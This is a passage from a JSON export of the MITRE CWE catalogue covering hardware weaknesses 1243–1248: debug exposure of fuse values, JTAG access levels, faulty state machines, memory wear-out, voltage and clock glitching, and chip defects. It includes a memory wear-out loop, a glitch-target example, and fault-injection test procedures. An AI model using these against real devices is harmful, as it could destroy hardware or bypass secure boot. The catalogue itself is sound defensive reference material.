via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents."},"Body_Text":"Remove all chicken bits and hidden features that are exposed to attackers. Add authorization schemes that rely on cryptographic primitives to access any features that the manufacturer does not want to expose. Clearly document all interfaces."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"212"}},{"attr":{"@_CAPEC_ID":"36"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1071"}},{"attr":{"@_External_Reference_ID":"REF-1072"}},{"attr":{"@_External_Reference_ID":"REF-1073"}},{"attr":{"@_External_Reference_ID":"REF-1074"}},{"attr":{"@_External_Reference_ID":"REF-1075"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, Related_Attack_Patterns"}}},"1243":{"attr":{"@_ID":"1243","@_Name":"Sensitive Non-Volatile Information Not Protected During Debug","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Access to security-sensitive information stored in fuses is not limited during debug.","Extended_Description":{"xhtml:p":"Several security-sensitive values are programmed into fuses to be used during early-boot flows or later at runtime. Examples of these security-sensitive values include root keys, encryption keys, manufacturing-specific information, chip-manufacturer-specific information, and original-equipment-manufacturer (OEM) data. After the chip is powered on, these values are sensed from fuses and stored in temporary locations such as registers and local memories. These locations are typically access-control protected from untrusted agents capable of accessing them. Even to trusted agents, only read-access is provided. However, these locations are not blocked during debug operations, allowing a user to access this sensitive information."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1263","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Modify Memory","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Disable access to security-sensitive information stored in fuses directly and also reflected from  temporary storage locations when in debug mode."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Sensitive manufacturing data (such as die information) are stored in fuses. When the chip powers on, these values are read from the fuses and stored in microarchitectural registers. These registers are only given read access to trusted software running on the core. Untrusted software running on the core is not allowed to access these registers.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"All microarchitectural registers in this chip can be accessed through the debug interface. As a result, even an untrusted debugger can access this data and retrieve sensitive manufacturing data."},{"attr":{"@_Nature":"informative"},"xhtml:div":"Registers used to store sensitive values read from fuses should be blocked during debug. These registers should be disconnected from the debug interface."}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"116"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Exposure of Security-Sensitive Fuse Values During Debug","attr":{"@_Date":"2020-08-20"}}}},"1244":{"attr":{"@_ID":"1244","@_Name":"Internal Asset Exposed to Unsafe Debug Access Level or State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses physical debug or test\\n        interfaces with support for multiple access levels, but it\\n        assigns the wrong debug access level to an internal asset,\\n        providing unintended access to the asset from untrusted debug\\n        agents.","Extended_Description":{"xhtml:p":["Debug authorization can have multiple levels of\\n\\t  access, defined such that different system internal assets\\n\\t  are accessible based on the current authorized debug\\n\\t  level. Other than debugger authentication (e.g., using\\n\\t  passwords or challenges), the authorization can also be\\n\\t  based on the system state or boot stage. For example, full\\n\\t  system debug access might only be allowed early in boot\\n\\t  after a system reset to ensure that previous session data is\\n\\t  not accessible to the authenticated debugger.","If this protection mechanism does not ensure that\\n          internal assets have the correct debug access level during\\n          each boot stage or change in system state, an attacker could\\n          obtain sensitive information from the internal asset using a\\n          debugger."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Integrity","Impact":"Modify Memory"},{"Scope":["Authorization","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}]},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Check 2 devices for their passcode to authenticate access to JTAG/debugging ports. If the passcodes are missing or the same, update the design to fix and retest. Check communications over JTAG/debugging ports for encryption. If the communications are not encrypted, fix the design and retest.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"For security-sensitive assets accessible over debug/test interfaces, only allow trusted agents."},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Apply blinding [REF-1219] or masking techniques in strategic areas.","Effectiveness":"Limited"},{"Phase":"Implementation","Description":"Add shielding or tamper-resistant protections to the device, which increases the difficulty and cost for accessing debug/test interfaces.","Effectiveness":"Limited"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The JTAG interface is used to perform debugging and provide CPU core access for developers. JTAG-access protection is implemented as part of the JTAG_SHIELD bit in the hw_digctl_ctrl register. This register has no default value at power up and is set only after the system boots from ROM and control is transferred to the user software.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tbody":{"xhtml:tr":[{"xhtml:td":["1 bit","0x0 = JTAG debugger is enabled (default)"]},{"xhtml:td":["JTAG_SHIELD","0x1 = JTAG debugger is disabled"]}]}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"The default value of this register bit should be set to 1 to prevent the JTAG from being enabled at system reset."}],"Body_Text":"This means that since the end user has access to JTAG at system reset and during ROM code execution before control is transferred to user software, a JTAG user can modify the boot flow and subsequently disclose all CPU information, including data-encryption keys."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-18827","Description":"After ROM code execution, JTAG access is disabled. But before the ROM code is executed, JTAG access is possible, allowing a user full system access.  This allows a user to modify the boot flow and successfully bypass the secure-boot process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"114"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1056"}},{"attr":{"@_External_Reference_ID":"REF-1057"}},{"attr":{"@_External_Reference_ID":"REF-1219"}}]},"Notes":{"Note":{"#text":"CWE-1191 and CWE-1244 both involve physical debug access,\\n\\t  but the weaknesses are different. CWE-1191 is effectively\\n\\t  about missing authorization for a debug interface,\\n\\t  i.e. JTAG.  CWE-1244 is about providing internal assets with\\n\\t  the wrong debug access level, exposing the asset to\\n\\t  untrusted debug agents.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Name, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"clarified differences between CWE-1191 and CWE-1244, and suggested rephrasing of descriptions and names."},"Previous_Entry_Name":{"#text":"Improper Authorization on Physical Debug and Test Interfaces","attr":{"@_Date":"2020-08-20"}}}},"1245":{"attr":{"@_ID":"1245","@_Name":"Improper Finite State Machines (FSMs) in Hardware Logic","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim\'s system.","Extended_Description":{"xhtml:p":"The functionality and security of the system heavily depend on the implementation of FSMs. FSMs can be used to indicate the current security state of the system. Lots of secure data operations and data transfers rely on the state reported by the FSM. Faulty FSM designs that do not account for all states, either through undefined states (left as don\'t cares) or through incorrect implementation, might lead an attacker to drive the system into an unstable state from which the system cannot recover without a reset, thus causing a DoS. Depending on what the FSM is used for, an attacker might also gain additional privileges to launch further attacks and compromise the security guarantees."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Instability","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Define all possible states and handle all unused states through default statements. Ensure that system defaults to a secure state.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The FSM shown in the \\"bad\\" code snippet below assigns the output out based on the value of state, which is determined based on the user provided input, user_input.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module fsm_1(out, user_input, clk, rst_n);input [2:0] user_input;input clk, rst_n;output reg [2:0] out;reg [1:0] state;always @ (posedge clk or negedge rst_n )endmodule","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"beginendout &lt;= {1\'h1, state};","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"if (!rst_n)state = 3\'h0;elsecase (user_input)endcase","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"3\'h0:3\'h1:3\'h2:3\'h3: state = 2\'h3;3\'h4: state = 2\'h2;3\'h5: state = 2\'h1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"case (user_input)endcase","xhtml:br":["",""],"xhtml:div":{"#text":"3\'h0:3\'h1:3\'h2:3\'h3: state = 2\'h3;3\'h4: state = 2\'h2;3\'h5: state = 2\'h1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:b":"default: state = 2\'h0;"}}}],"Body_Text":{"xhtml:p":["The case statement does not handle the scenario when user provides inputs of 3\'h6 and 3\'h7 using a default statement.  Those inputs push the system to an undefined state and might cause a crash (denial of service) or any other unanticipated outcome.","Adding a default statement to handle undefined inputs mitigates this issue.  This is shown in the \\"Good\\" code snippet below.  The default statement is in bold."]}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1060"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1246":{"attr":{"@_ID":"1246","@_Name":"Improper Write Handling in Limited-write Non-Volatile Memories","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories.","Extended_Description":{"xhtml:p":"Non-volatile memories such as NAND Flash, EEPROM, etc. have individually erasable segments, each of which can be put through a limited number of program/erase or write cycles. For example, the device can only endure a limited number of writes, after which the device becomes unreliable. In order to wear out the cells in a uniform manner, non-volatile memory and storage products based on the above-mentioned technologies implement a technique called wear leveling. Once a set threshold is reached, wear leveling maps writes of a logical block to a different physical block. This prevents a single physical block from prematurely failing due to a high concentration of writes. If wear leveling is improperly implemented, attackers may be able to programmatically cause the storage to become unreliable within a much shorter time than would normally be expected."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Storage IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Instability"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":"Include secure wear leveling algorithms and ensure they may not be bypassed.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An attacker can render a memory line unusable by repeatedly causing a write to the memory line.","Body_Text":["Below is example code from [REF-1058] that the user can execute repeatedly to cause line failure. W is the maximum associativity of any cache in the system; S is the size of the largest cache in the system.","Without wear leveling, the above attack will be successful. Simple randomization of blocks will not suffice as instead of the original physical block, the randomized physical block will be worn out."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"Do aligned alloc of (W+1) arrays each of size S}","xhtml:br":"","xhtml:div":{"#text":"while(1) {","xhtml:br":"","xhtml:div":{"#text":"for (ii = 0; i &lt; W + 1; ii++)","xhtml:div":{"#text":"array[ii].element[0]++;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"Wear leveling must be used to even out writes to the device."}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"212"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1058"}},{"attr":{"@_External_Reference_ID":"REF-1059"}}]},"Notes":{"Note":{"#text":"The Technology-Class should be Memory.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1247":{"attr":{"@_ID":"1247","@_Name":"Improper Protection Against Voltage and Clock Glitches","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device.","Extended_Description":{"xhtml:p":"A device might support features such as secure boot which are supplemented with hardware and firmware support. This involves establishing a chain of trust, starting with an immutable root of trust by checking the signature of the next stage (culminating with the OS and runtime software) against a golden value before transferring control. The intermediate stages typically set up the system in a secure state by configuring several access control settings. Similarly, security logic for exercising a debug or testing interface may be implemented in hardware, firmware, or both. A device needs to guard against fault attacks such as voltage glitches and clock glitches that an attacker may employ in an attempt to compromise the system."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Clock/Counter IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Memory","Modify Memory","Execute Unauthorized Code or Commands"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":{"xhtml:p":["Put the processor in an infinite\\n\\t\\t\\tloop, which is then followed by instructions\\n\\t\\t\\tthat should not ever be executed, since the\\n\\t\\t\\tloop is not expected to exit.  After the loop,\\n\\t\\t\\ttoggle an I/O bit (for oscilloscope monitoring\\n\\t\\t\\tpurposes), print a console message, and\\n\\t\\t\\treenter the loop.  Note that to ensure that\\n\\t\\t\\tthe loop exit is actually captured, many NOP\\n\\t\\t\\tinstructions should be coded after the loop\\n\\t\\t\\tbranch instruction and before the I/O bit\\n\\t\\t\\ttoggle and the print statement.","Margining the clock consists of varying the clock\\n\\t\\t\\tfrequency until an anomaly occurs. This could be a\\n\\t\\t\\tcontinuous frequency change or it could be a single\\n\\t\\t\\tcycle. The single cycle method is described here. For\\n\\t\\t\\tevery 1000th clock pulse, the clock cycle is shortened by\\n\\t\\t\\t10 percent. If no effect is observed, the width is\\n\\t\\t\\tshortened by 20%. This process is continued in 10%\\n\\t\\t\\tincrements up to and including 50%. Note that the cycle\\n\\t\\t\\ttime may be increased as well, down to seconds per\\n\\t\\t\\tcycle.","Separately, the voltage is margined. Note that\\n\\t\\t\\tthe voltage could be increased or decreased. Increasing\\n\\t\\t\\tthe voltage has limits, as the circuitry may not be able\\n\\t\\t\\tto withstand a drastically increased voltage. This process\\n\\t\\t\\tstarts with a 5% reduction of the DC supply to the CPU\\n\\t\\t\\tchip for 5 millisecond repeated at 1KHz. If this has no\\n\\t\\t\\teffect, the process is repeated, but a 10% reduction is\\n\\t\\t\\tused. This process is repeated at 10% increments down to a\\n\\t\\t\\t50% reduction. If no effects are observed at 5\\n\\t\\t\\tmillisecond, the whole process is repeated using a 10\\n\\t\\t\\tmillisecond pulse. If no effects are observed, the process\\n\\t\\t\\tis repeated in 10 millisecond increments out to 100\\n\\t\\t\\tmillisecond pulses.","While these are suggested starting points for\\n\\t\\t\\ttesting circuitry for weaknesses, the limits may need to\\n\\t\\t\\tbe pushed further at the risk of device damage. See\\n\\t\\t\\t[REF-1217] for descriptions of Smart Card attacks against\\n\\t\\t\\ta clock (section 14.6.2) and using a voltage glitch\\n\\t\\t\\t(section 15.5.3)."]},"Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"During the implementation phase where actual hardware is available, specialized hardware tools and apparatus such as ChipWhisperer may be used to check if the platform is indeed susceptible to voltage and clock glitching attacks."},{"Method":"Architecture or Design Review","Description":"Review if the protections against glitching merely transfer the attack target. For example, suppose a critical authentication routine that an attacker would want to bypass is given the protection of modifying certain artifacts from within that specific routine (so that if the routine is bypassed, one can examine the artifacts and figure out that an attack must have happened). However, if the attacker has the ability to bypass the critical authentication routine, they might also have the ability to bypass the other protection routine that checks the artifacts. Basically, depending on these kind of protections is akin to resorting to \\"Security by Obscurity\\"."},{"Method":"Architecture or Design Review","Description":"Many SoCs come equipped with a built-in Dynamic Voltage and Frequency Scaling (DVFS) that can control the voltage and clocks via software alone. However, there have been demonstrated attacks (like Plundervolt and CLKSCREW) that target this DVFS [REF-1081] [REF-1082]. During the design and implementation phases, one needs to check if the interface to this power management feature is available from unprivileged SW (CWE-1256), which would make the attack very easy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"At the circuit-level, using Tunable Replica Circuits (TRCs) or special flip-flops such as Razor flip-flops helps mitigate glitch attacks. Working at the SoC or platform base, level sensors may be implemented to detect glitches. Implementing redundancy in security-sensitive code (e.g., where checks are performed)also can help with mitigation of glitch attacks."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Below is a representative snippet of C code that is part of the secure-boot flow. A signature of the runtime-firmware image is calculated and compared against a golden value. If the signatures match, the bootloader loads runtime firmware. If there is no match, an error halt occurs. If the underlying hardware executing this code does not contain any circuitry or sensors to detect voltage or clock glitches, an attacker might launch a fault-injection attack right when the signature check is happening (at the location marked with the comment), causing a bypass of the signature-checking process.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["...","if (signature_matches)  // &lt;-Glitch Here","{",{"#text":"load_runtime_firmware();","attr":{"@_style":"text-indent: 15px;"}},"}","else","{",{"#text":"do_not_load_runtime_firmware();","attr":{"@_style":"text-indent: 15px;"}},"}","..."],"xhtml:br":["",""]},{"attr":{"@_Nature":"informative"},"xhtml:div":"If the underlying hardware detects a voltage or clock glitch, the information can be used to prevent the glitch from being successful."}],"Body_Text":"After bypassing secure boot, an attacker can gain access to system assets to which the attacker should not have access."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-17391","Description":"Lack of anti-glitch protections allows an attacker to launch a physical attack to bypass the secure boot and read protected eFuses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17391"}},"Functional_Areas":{"Functional_Area":["Power","Clock"]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1061"}},{"attr":{"@_External_Reference_ID":"REF-1062"}},{"attr":{"@_External_Reference_ID":"REF-1063"}},{"attr":{"@_External_Reference_ID":"REF-1064"}},{"attr":{"@_External_Reference_ID":"REF-1065"}},{"attr":{"@_External_Reference_ID":"REF-1066"}},{"attr":{"@_External_Reference_ID":"REF-1217","@_Section":"14.6.2 Security Evolution, page 291"}},{"attr":{"@_External_Reference_ID":"REF-1217","@_Section":"15.5.3 Glitching, page 317"}},{"attr":{"@_External_Reference_ID":"REF-1081"}},{"attr":{"@_External_Reference_ID":"REF-1082"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods"},"Previous_Entry_Name":{"#text":"Missing Protection Against Voltage and Clock Glitches","attr":{"@_Date":"2020-08-20"}}}},"1248":{"attr":{"@_ID":"1248","@_Name":"Semiconductor Defects in Hardware Logic with Security-Sensitive Implications","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The security-sensitive hardware module contains semiconductor defects.","Extended_Description":{"xhtml:p":"A semiconductor device can fail for various reasons. While some are manufacturing and packaging defects, the rest are due to prolonged use or usage under extreme conditions. Some mechanisms that lead to semiconductor defects include encapsulation failure, die-attach failure, wire-bond failure, bulk-silicon defects, oxide-layer faults, aluminum-metal faults (including electromigration, corrosion of aluminum, etc.), and thermal/electrical stress. These defects manifest as faults on chip-internal signals or registers, have the effect of inputs, outputs, or intermediate signals being always 0 or always 1, and do not switch as expected. If such faults occur in security-sensitive hardware modules, security guarantees offered by the device will be compromised."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Manufacturing","Note":"May be introduced due to issues in the manufacturing environment or improper handling of components, for example."},{"Phase":"Operation","Note":"May be introduced by improper handling or usage outside of rated operating environments (temperature, humidity, etc.)"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":"DoS: Instability"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":{"xhtml:p":"While semiconductor-manufacturing companies implement several mechanisms to continuously improve the semiconductor manufacturing process to ensure reduction of defects, some defects can only be fixed after manufacturing. Post-manufacturing testing of silicon die is critical. Fault models such as stuck-at-0 or stuck-at-1 must be used to develop post-manufacturing test cases and achieve good coverage. Once the silicon packaging is done, extensive post-silicon testing must be performed to ensure that hardware logic implementing security functionalities is defect-free."}},{"Phase":"Operation","Description":{"xhtml:p":"Operating the hardware outside device specification, such as at extremely high temperatures, voltage, etc., accelerates semiconductor degradation and results in defects.  When these defects manifest as faults in security-critical, hardware modules, it results in compromise of security guarantees. Thus, operating the device within the specification is important."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The network-on-chip implements a firewall for access control to peripherals from all IP cores capable of mastering transactions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"A manufacturing defect in this logic manifests itself as a logical fault, which always sets the output of the filter to \\"allow\\" access."},"Body_Text":"Post-manufacture testing must be performed to ensure that hardware logic implementing security functionalities is defect-free."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1067"}},{"attr":{"@_External_Reference_ID":"REF-1068"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Modes_of_Introduction, Related_Attack_Patterns"}}},"1249":{"attr":{"@_ID":"1249","@_Name":"Application-Level Admin Tool with Inconsistent View of Underlying Operating System","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application\'s model of the OS\'s state is inconsistent with the OS\'s actual state.","Extended_Description":{"xhtml:p":["Many products provide web-based applications or other software for managing the underlying operating system. This is common with cloud, network access devices, home networking, and other systems.  